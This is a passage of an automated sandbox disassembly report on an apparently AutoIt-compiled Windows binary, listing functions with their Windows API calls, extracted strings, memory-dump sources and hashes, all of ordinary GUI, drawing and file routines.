                            • DeleteObject.GDI32(00000000), ref: 0043785B
                            • DeleteObject.GDI32(00000000), ref: 0043786D
                            • DestroyWindow.USER32 ref: 0043787B
                            • GetDesktopWindow.USER32 ref: 00437895
                            • GetWindowRect.USER32(00000000), ref: 0043789C
                            • SetRect.USER32 ref: 004379DD
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004379ED
                            • CreateWindowExW.USER32 ref: 00437A35
                            • GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00437A41
                            • CreateWindowExW.USER32 ref: 00437A7B
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00437A9D
                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00437AB0
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00437ABB
                            • GlobalLock.KERNEL32(00000000), ref: 00437AC4
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 00437AD3
                            • GlobalUnlock.KERNEL32(00000000), ref: 00437ADC
                            • CloseHandle.KERNEL32(00000000), ref: 00437AE3
                            • GlobalFree.KERNEL32(00000000), ref: 00437AEE
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 00437B00
                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00452CAC,00000000), ref: 00437B16
                            • GlobalFree.KERNEL32(00000000), ref: 00437B26
                            • CopyImage.USER32 ref: 00437B4C
                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00437B6B
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 00437B8D
                            • ShowWindow.USER32(00000004), ref: 00437D7A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                            • String ID: $AutoIt v3$DISPLAY$static
                            • API String ID: 2211948467-2373415609
                            • Opcode ID: 4d24579a9e3e233199335b8dff9b65a7c2a2a7b64a8f1c7c907c78219b700003
                            • Instruction ID: 5c63b1f2f7f815f79ec8db8bf2409c8ab6a4b6d8484f0de070d24d3b57ea20c3
                            • Opcode Fuzzy Hash: 4d24579a9e3e233199335b8dff9b65a7c2a2a7b64a8f1c7c907c78219b700003
                            • Instruction Fuzzy Hash: B30279B5900215EFDB14DFA4DC89EAE7BB9FF49310F108169F905AB2A1CB74AD01CB64
                            Function 0044356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00443627
                            • IsWindowVisible.USER32(?), ref: 0044364B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharUpperVisibleWindow
                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                            • API String ID: 4105515805-45149045
                            • Opcode ID: 08f0d1e01c85daa6989ad9b81213eff884ada9e452ccc8b8f99a27259647e622
                            • Instruction ID: 7da015f1e727379563f04b7fd0ea41f13dc23b8594a3ddee98e185ca006cf466
                            • Opcode Fuzzy Hash: 08f0d1e01c85daa6989ad9b81213eff884ada9e452ccc8b8f99a27259647e622
                            • Instruction Fuzzy Hash: A4D1B3302043019BDB04EF10C455EAE77E1AF55745F15856EF8869B3E2CB39EE8ACB4A
                            Function 0044A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                            Download Yara Rule
                            APIs
                            • SetTextColor.GDI32(?,00000000), ref: 0044A630
                            • GetSysColorBrush.USER32 ref: 0044A661
                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,003FB93A,?,?), ref: 0044A66D
                            • SetBkColor.GDI32(?,000000FF), ref: 0044A687
                            • SelectObject.GDI32(?,00000000), ref: 0044A696
                            • InflateRect.USER32 ref: 0044A6C1
                            • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,003FB93A,?,?), ref: 0044A6C9
                            • CreateSolidBrush.GDI32(00000000), ref: 0044A6D0
                            • FrameRect.USER32 ref: 0044A6DF
                            • DeleteObject.GDI32(00000000), ref: 0044A6E6
                            • InflateRect.USER32 ref: 0044A731
                            • FillRect.USER32 ref: 0044A763
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A78E
                              • Part of subcall function 0044A8CA: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?), ref: 0044A903
                              • Part of subcall function 0044A8CA: SetTextColor.GDI32(?,?), ref: 0044A907
                              • Part of subcall function 0044A8CA: GetSysColorBrush.USER32 ref: 0044A91D
                              • Part of subcall function 0044A8CA: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044A928
                              • Part of subcall function 0044A8CA: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044A945
                              • Part of subcall function 0044A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044A953
                              • Part of subcall function 0044A8CA: SelectObject.GDI32(?,00000000), ref: 0044A964
                              • Part of subcall function 0044A8CA: SetBkColor.GDI32(?,00000000), ref: 0044A96D
                              • Part of subcall function 0044A8CA: SelectObject.GDI32(?,?), ref: 0044A97A
                              • Part of subcall function 0044A8CA: InflateRect.USER32 ref: 0044A999
                              • Part of subcall function 0044A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044A9B0
                              • Part of subcall function 0044A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0044A9C5
                              • Part of subcall function 0044A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044A9ED
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                            • String ID:
                            • API String ID: 3521893082-0
                            • Opcode ID: 478bb7f9fb8041a7543ee5543b90f68fe5bf2d0e99cc01057abbc71217e75bea
                            • Instruction ID: db22b46bdcacb71c1521c134e7836579481ce3436bbf21763df9ac017ee9b05f
                            • Opcode Fuzzy Hash: 478bb7f9fb8041a7543ee5543b90f68fe5bf2d0e99cc01057abbc71217e75bea
                            • Instruction Fuzzy Hash: 8B917D76008301FFD7109F64DC08A5BBBA9FF89321F100B2AF9A2961A1D775D949CB5A
                            Function 003C2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32 ref: 003C2CA2
                            • DeleteObject.GDI32(00000000), ref: 003C2CE8
                            • DeleteObject.GDI32(00000000), ref: 003C2CF3
                            • DestroyIcon.USER32(00000000,?,?,?), ref: 003C2CFE
                            • DestroyWindow.USER32 ref: 003C2D09
                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 003FC43B
                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003FC474
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003FC89D
                              • Part of subcall function 003C1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 003C1B9A
                            • SendMessageW.USER32(?,00001053), ref: 003FC8DA
                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003FC8F1
                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003FC907
                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003FC912
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                            • String ID: 0
                            • API String ID: 464785882-4108050209
                            • Opcode ID: dd9e0ce16078e8261a28f85b8310faed21abad469a98509e1c82334542ff4d6e
                            • Instruction ID: cca5979cb2522506885326b5174dc539fc7b0383c87edbd5357c9dce630f3ead
                            • Opcode Fuzzy Hash: dd9e0ce16078e8261a28f85b8310faed21abad469a98509e1c82334542ff4d6e
                            • Instruction Fuzzy Hash: 4F12AB34254209EFDB12CF24CA84BBAB7E5BF45300F559579E689CB662CB31EC46CB90
                            Function 004374AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32 ref: 004374DE
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0043759D
                            • SetRect.USER32 ref: 004375DB
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004375ED
                            • CreateWindowExW.USER32 ref: 00437633
                            • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0043763F
                            • CreateWindowExW.USER32 ref: 00437683
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00437692
                            • GetStockObject.GDI32(00000011), ref: 004376A2
                            • SelectObject.GDI32(00000000,00000000), ref: 004376A6
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004376B6
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 004376BF
                            • DeleteDC.GDI32(00000000), ref: 004376C8
                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004376F4
                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 0043770B
                            • CreateWindowExW.USER32 ref: 00437746
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0043775A
                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 0043776B
                            • CreateWindowExW.USER32 ref: 0043779B
                            • GetStockObject.GDI32(00000011), ref: 004377A6
                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004377B1
                            • ShowWindow.USER32(00000004), ref: 004377BB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            • Opcode ID: 6a6cd7d32e2ee6dbf69f7d76776c5a745d99eaaf7804961567717b7ce0d43cbf
                            • Instruction ID: 8fff41695cf218d4e4f55eefaa7783b6561a11eae22983a6e4b50458d37e387b
                            • Opcode Fuzzy Hash: 6a6cd7d32e2ee6dbf69f7d76776c5a745d99eaaf7804961567717b7ce0d43cbf
                            • Instruction Fuzzy Hash: 6AA163B1A40615BFEB15DBA4DC49FAF7B69EB09710F004169FA14E72E0CB74AD04CB68
                            Function 0042AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0042AD1E
                            • GetDriveTypeW.KERNEL32(?,0044FAC0,?,\\.\,0044F910), ref: 0042ADFB
                            • SetErrorMode.KERNEL32(00000000,0044FAC0,?,\\.\,0044F910), ref: 0042AF59
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                            • API String ID: 2907320926-4222207086
                            • Opcode ID: 5e2f70c039b7592d314f0ee56af36d0720208ffcba43aab29761c8c8192fca8d
                            • Instruction ID: 2dcc966a25bef6530c2363657818e2f140d9065c2860034bc64c24eac1b87aeb
                            • Opcode Fuzzy Hash: 5e2f70c039b7592d314f0ee56af36d0720208ffcba43aab29761c8c8192fca8d
                            • Instruction Fuzzy Hash: 5E5199B17842159B8B10DB10EA46EBD7361EB487147B1805BFC0AA7291DE3C9D62DB4F
                            Function 00449A1C Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 455windowCOMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103), ref: 00449AD2
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00449B8B
                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00449BA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: 0$`$
                            • API String ID: 2326795674-1801689331
                            • Opcode ID: 226788585847c5f05910d25a9d3870fbf9197e591a34387a4691aa9c0f83c827
                            • Instruction ID: 04e9ccc228d2198ce666c3999694297c6d3533e35954a4973ef0d393954bcb9e
                            • Opcode Fuzzy Hash: 226788585847c5f05910d25a9d3870fbf9197e591a34387a4691aa9c0f83c827
                            • Instruction Fuzzy Hash: 5F02D030104241AFE725CF14C889BABBBE5FF49314F04852EF999D62A1C738DC59EB5A
                            Function 003C68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-86951937
                            • Opcode ID: 8d69dbfb5966c4df5227b934bf68d5a014124a3aa1f742b28800e59e8005c0ce
                            • Instruction ID: 877433732cc4bc8b422f81741ae76e3957a311955a47b422d7dec1806490188b
                            • Opcode Fuzzy Hash: 8d69dbfb5966c4df5227b934bf68d5a014124a3aa1f742b28800e59e8005c0ce
                            • Instruction Fuzzy Hash: 6E8125B16006196ACB23AA61DC47FBF3B68AF09700F14402AF905EF1D2EB74DE45C7A4
                            Function 004489D5 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00448AC1
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00448AD2
                            • CharNextW.USER32(0000014E), ref: 00448B01
                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00448B42
                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00448B58
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00448B69
                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00448B86
                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00448BD8
                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00448BEE
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00448C1F
                            • _memset.LIBCMT ref: 00448C44
                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00448C8D
                            • _memset.LIBCMT ref: 00448CEC
                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00448D16
                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00448D6E
                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00448E1B
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00448E3D
                            • GetMenuItemInfoW.USER32 ref: 00448E87
                            • SetMenuItemInfoW.USER32 ref: 00448EB4
                            • DrawMenuBar.USER32(?), ref: 00448EC3
                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00448EEB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                            • String ID: 0$`$
                            • API String ID: 1073566785-1801689331
                            • Opcode ID: 9531cebe62902caae515db6e95a89c48abb8eb1366b23ef6d89993f334e8516f
                            • Instruction ID: c0b1aca1b93058ca7186d2de3fe1599f2b0a2ed9377e500c639f936c9950d6d3
                            • Opcode Fuzzy Hash: 9531cebe62902caae515db6e95a89c48abb8eb1366b23ef6d89993f334e8516f
                            • Instruction Fuzzy Hash: AFE1B274901218AFEF209F50CC84EEF7B79EF06710F10815BFA15AA290DB789985CF69
                            Function 0044A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?), ref: 0044A903
                            • SetTextColor.GDI32(?,?), ref: 0044A907
                            • GetSysColorBrush.USER32 ref: 0044A91D
                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044A928
                            • CreateSolidBrush.GDI32(?), ref: 0044A92D
                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044A945
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044A953
                            • SelectObject.GDI32(?,00000000), ref: 0044A964
                            • SetBkColor.GDI32(?,00000000), ref: 0044A96D
                            • SelectObject.GDI32(?,?), ref: 0044A97A
                            • InflateRect.USER32 ref: 0044A999
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044A9B0
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0044A9C5
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044A9ED
                            • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044AA14
                            • InflateRect.USER32 ref: 0044AA32
                            • DrawFocusRect.USER32 ref: 0044AA3D
                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0044A5FA), ref: 0044AA4B
                            • SetTextColor.GDI32(?,00000000), ref: 0044AA53
                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0044AA67
                            • SelectObject.GDI32(?,0044A5FA), ref: 0044AA7E
                            • DeleteObject.GDI32(?), ref: 0044AA89
                            • SelectObject.GDI32(?,?), ref: 0044AA8F
                            • DeleteObject.GDI32(?), ref: 0044AA94
                            • SetTextColor.GDI32(?,?), ref: 0044AA9A
                            • SetBkColor.GDI32(?,?), ref: 0044AAA4
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1996641542-0
                            • Opcode ID: 4faa364f0824b5f74f5e167273f5caf1aa342e0541f2459f09ece61043a42c9d
                            • Instruction ID: f2b5a850d0214c5fe8892bf3f7db4c5c4f41a8fad09d75db86a76b1d9cf33f34
                            • Opcode Fuzzy Hash: 4faa364f0824b5f74f5e167273f5caf1aa342e0541f2459f09ece61043a42c9d
                            • Instruction Fuzzy Hash: DC517B75800208FFEB109FA4DC49EAEBBB9EF09320F114626F911AB2A1D7759D50CF94
                            Function 0044488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCursorPos.USER32(?), ref: 004449CA
                            • GetDesktopWindow.USER32 ref: 004449DF
                            • GetWindowRect.USER32(00000000), ref: 004449E6
                            • GetWindowLongW.USER32(?,000000F0), ref: 00444A48
                            • DestroyWindow.USER32 ref: 00444A74
                            • CreateWindowExW.USER32 ref: 00444A9D
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00444ABB
                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00444AE1
                            • SendMessageW.USER32(?,00000421,?,?), ref: 00444AF6
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00444B09
                            • IsWindowVisible.USER32(?), ref: 00444B29
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00444B44
                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00444B58
                            • GetWindowRect.USER32(?,?), ref: 00444B70
                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00444B96
                            • GetMonitorInfoW.USER32(00000000,?), ref: 00444BB0
                            • CopyRect.USER32(?,?), ref: 00444BC7
                            • SendMessageW.USER32(?,00000412,00000000), ref: 00444C32
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                            • String ID: ($0$tooltips_class32
                            • API String ID: 698492251-4156429822
                            • Opcode ID: 7883d45501261ac6acb1cf483ca61a1428f0c4a0f4225c9cbb00ff280d7a867a
                            • Instruction ID: f6d5b00ab873f379faa04828e8b726c6c47baebaf77cbb533c69a8fb37be9235
                            • Opcode Fuzzy Hash: 7883d45501261ac6acb1cf483ca61a1428f0c4a0f4225c9cbb00ff280d7a867a
                            • Instruction Fuzzy Hash: 3EB16B71604340AFEB04DF64C848B6BBBE4FB89314F01891EF5999B291DB75EC05CB59
                            Function 0042449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                            Download Yara Rule
                            APIs
                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004244AC
